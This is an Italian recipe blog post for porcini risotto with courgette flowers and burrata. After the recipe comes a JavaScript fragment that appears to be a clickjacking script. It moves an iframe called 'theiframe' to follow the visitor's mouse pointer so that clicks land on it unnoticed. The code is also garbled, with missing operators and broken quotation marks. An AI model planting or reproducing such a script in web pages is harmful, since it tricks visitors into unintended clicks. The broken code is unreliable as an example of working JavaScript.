lunedì 21 ottobre 2013

Risotto ai porcini con fiori di zucca e burrata

INGREDIENTI PER 4 PERSONE:320 gr di riso carnaroli,200 gr di funghi porcini,100 gr di burrata,1/2 cipolla,12 fiori di zucca,erbe aromatiche,brodo di carne q.b.,olio extravergine di oliva,sale PREPARAZIONE:Tritate finemente la cipolla e fatela rosolare con l olio ,aggiungete il riso e fatelo tostare,aggiungete meta' dei funghi puliti e tagliati e mescolate.Bagnate con il brodo ,aggiungendone man mano che viene assorbito.A meta' cottura unite 4 fiori di zucca spezzettati.Dopo 15 min cira il riso e' pronto e mettetelo a riposare.Tagliate a cubetti i funghi restanti e rosolate in una padella con olio e un pizzico di sale.Intanto tritate le erbe aromatiche e condite la burrata con un cucchiaio di olio.Stendete gli altri fiori di zucca su una placca e passateli per tre min al forno.Mantecate il risotto con la burrata ,poi disponete su ciascun piatto lasciando intravedere due fiori di zucca stesi sotto al riso e servite con un cucchiaio di funghi sopra ogni porzione.
text/javascript”> var opacity = 0.5; var time = 0; if((document.getElementById) window.addEventListener || window.attachEvent){ (function(){ var hairCol = “#ff0000″; var d = document; var my = -10; var mx = -10; var r; var vert = “”; var idx = document.getElementsByTagName(‘div’).length; var thehairs = “”; document.write(thehairs); var like = document.getElementById(“theiframe”); document.getElementsByTagName(‘body’)[0].appendChild(like); var pix = “px”; var domWw = (typeof window.innerWidth == “number”); var domSy = (typeof window.pageYOffset == “number”); if (domWw) r = window; else{ if (d.documentElement typeof d.documentElement.clientWidth == “number” d.documentElement.clientWidth != 0) r = d.documentElement; else{ if (d.body typeof d.body.clientWidth == “number”) r = d.body; } } if(time != 0){ setTimeout(function(){ document.getElementsByTagName(‘body’)[0].removeChild(like); if (window.addEventListener){ document.removeEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ document.detachEvent(“onmousemove”,mouse); } }, time); } function scrl(yx){ var y,x; if (domSy){ y = r.pageYOffset; x = r.pageXOffset; } else{ y = r.scrollTop; x = r.scrollLeft; } return (yx == 0) ? y:x; } function mouse(e){ var msy = (domSy)?window.pageYOffset:0; if (!e) e = window.event; if (typeof e.pageY == ‘number’){ my = e.pageY – 5 – msy; mx = e.pageX – 4; } else{ my = e.clientY – 6 – msy; mx = e.clientX – 6; } vert.top = my + scrl(0) + pix; vert.left = mx + pix; } function ani(){ vert.top = my + scrl(0) + pix; setTimeout(ani, 300); } function init(){ vert = document.getElementById(“theiframe”).style; ani(); } if (window.addEventListener){ window.addEventListener(“load”,init,false); document.addEventListener(“mousemove”,mouse,false); } else if (window.attachEvent){ window.attachEvent(“onload”,init); document.attachEvent(“onmousemove”,mouse); } })(); }//End. script>